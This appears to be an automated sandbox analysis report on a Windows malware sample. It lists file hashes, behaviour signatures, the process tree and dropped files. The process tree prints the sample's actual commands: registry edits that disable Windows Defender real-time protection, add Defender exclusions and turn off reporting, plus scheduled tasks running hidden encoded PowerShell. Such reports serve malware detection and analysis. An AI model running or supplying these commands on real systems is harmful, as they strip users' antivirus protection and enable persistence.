Analysis
-
max time kernel
151s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
03-10-2022 07:02
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
2b9f7e62a158f46bbd476a09f6309c99
-
SHA1
53ca5afbe82b5b577b8d754d0b0248b02dfe1776
-
SHA256
28d501fd312d71c533498aa5d35e408b68820206ffd34dce7c38018fd5e4f34d
-
SHA512
2e9ce5a4d0f7dee3491365105103d830918d670ce924e8314441bfaeb44277bb745d96c0dfc3378c933247111d3dd94a2bddb47a5e3f1bb03f093a6e44bb9b48
-
SSDEEP
196608:91OmzwtIA+YzrVJAJ2GgUqONGvjGLMpdAs6vw:3O1uA+YvXAJ2Gg5ONgGMpupvw
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 36 IoCs
-
Executes dropped EXE 3 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 8 IoCs
-
Drops file in System32 directory 8 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 8 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS31EA.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS40B9.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXcbmvcRy" /SC once /ST 03:53:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXcbmvcRy"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXcbmvcRy"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 09:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\SEcCofr.exe\" d8 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\system32\taskeng.exetaskeng.exe {35D01037-5F06-4226-9C68-40DB8321DA55} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {DB9F9B70-F6BB-4928-8BE0-375C74F5BC0E} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\SEcCofr.exeC:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\SEcCofr.exe d8 /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gLITuJqoR" /SC once /ST 06:17:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gLITuJqoR"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gLITuJqoR"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "giQkrcyHx" /SC once /ST 05:30:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "giQkrcyHx"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "giQkrcyHx"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\fwhiGQHhSfnZUzkc\gcWfOjIO\csoTFpsieIBdIzYY.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\fwhiGQHhSfnZUzkc\gcWfOjIO\csoTFpsieIBdIzYY.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CEEEIGvNcEpIBnVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CEEEIGvNcEpIBnVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CEEEIGvNcEpIBnVB" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CEEEIGvNcEpIBnVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFACLCJiz" /SC once /ST 07:17:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFACLCJiz"3⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7zS31EA.tmp\Install.exeFilesize
6.2MB
MD522b547949246318eea6b04ce129ec09f
SHA1b03c29d7f001ade76d377d154d002a6e77f08a6e
SHA2565e041c242cccbf1345057c04746ca5aa681376027dc3a0bbb79851790b8c447a
SHA5124cb9905254c44f29d907e038b682d517f02f4faf86e0d09e85e1fabb7570006ef47d8a2ff976bce81d4587c382dd6ff12545a9d6252fcd5797d3513114a041ad
-
C:\Users\Admin\AppData\Local\Temp\7zS31EA.tmp\Install.exeFilesize
6.2MB
MD522b547949246318eea6b04ce129ec09f
SHA1b03c29d7f001ade76d377d154d002a6e77f08a6e
SHA2565e041c242cccbf1345057c04746ca5aa681376027dc3a0bbb79851790b8c447a
SHA5124cb9905254c44f29d907e038b682d517f02f4faf86e0d09e85e1fabb7570006ef47d8a2ff976bce81d4587c382dd6ff12545a9d6252fcd5797d3513114a041ad
-
C:\Users\Admin\AppData\Local\Temp\7zS40B9.tmp\Install.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
C:\Users\Admin\AppData\Local\Temp\7zS40B9.tmp\Install.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\SEcCofr.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\SEcCofr.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD537972e87bf168abe828028524a67ea92
SHA1d72a114210bc36a9938c4b10c1a0e81051fd9435
SHA256b7517624d540d4da2b4f2103bdc00277710f1028efb4b67b14150fe10a0d180f
SHA51212ee8e239b069e60d99ec99cb3d9efd458444fd563ecf4066973cf22b96629c098b918140ac1e95464d3803295b21577372955722b061bfdb7b62b7ef5d04bba
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5b120facc8dd52f5d4bafbb7c37687762
SHA1b83c263f2191508eea48f1f14ac731c3121cd2cf
SHA2562df04677d32a0f1c09cc799cc538655a070a236ff2e83a69c6b9c7a01bfdf791
SHA512358c16887ca1c386e5f4ad0cc1484562bc1b36a4b8f31ccfcd9237dad08f566b0f98af05c3cf28ecbbc486b25f0dd46513d773aca336fe03968c65721e8850cb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD55c8b1d7ce66b32798b3c644b00d7218b
SHA151aa046cdca233b1af25d15bbfa8ca6109886df8
SHA256b40a490c4ab1c9b530f11113bda79ad51648d45b50c8cc2f9ed3d4c22a598f79
SHA51295492b60803f17bfc965161b69421b4ae0bb2b7fa383d9f80e391146c3b03c7f718c2e38d65571efd9ca87b7c8998a3bf5d1c06c12b320acd4eea1e191b83055
-
C:\Windows\Temp\fwhiGQHhSfnZUzkc\gcWfOjIO\csoTFpsieIBdIzYY.wsfFilesize
8KB
MD5b64c7e0979518e5396b3f76eda858f71
SHA1ccc232c9737ccdacecd440ec13e243499d7d7974
SHA256aea03e30396443537acfe685e689fd1ca91aedf46bc5f1b2ecabaa79b1af7d40
SHA512cc707e35d96dd8d80177d6a37c9828bf894c20366e2302af4778a4d96a26e3f755bc5bf7c3c76262465c4477417976cf8fed4929e8268d6eb28ddaab57632888
-
C:\Windows\system32\GroupPolicy\gpt.iniFilesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
\Users\Admin\AppData\Local\Temp\7zS31EA.tmp\Install.exeFilesize
6.2MB
MD522b547949246318eea6b04ce129ec09f
SHA1b03c29d7f001ade76d377d154d002a6e77f08a6e
SHA2565e041c242cccbf1345057c04746ca5aa681376027dc3a0bbb79851790b8c447a
SHA5124cb9905254c44f29d907e038b682d517f02f4faf86e0d09e85e1fabb7570006ef47d8a2ff976bce81d4587c382dd6ff12545a9d6252fcd5797d3513114a041ad
-
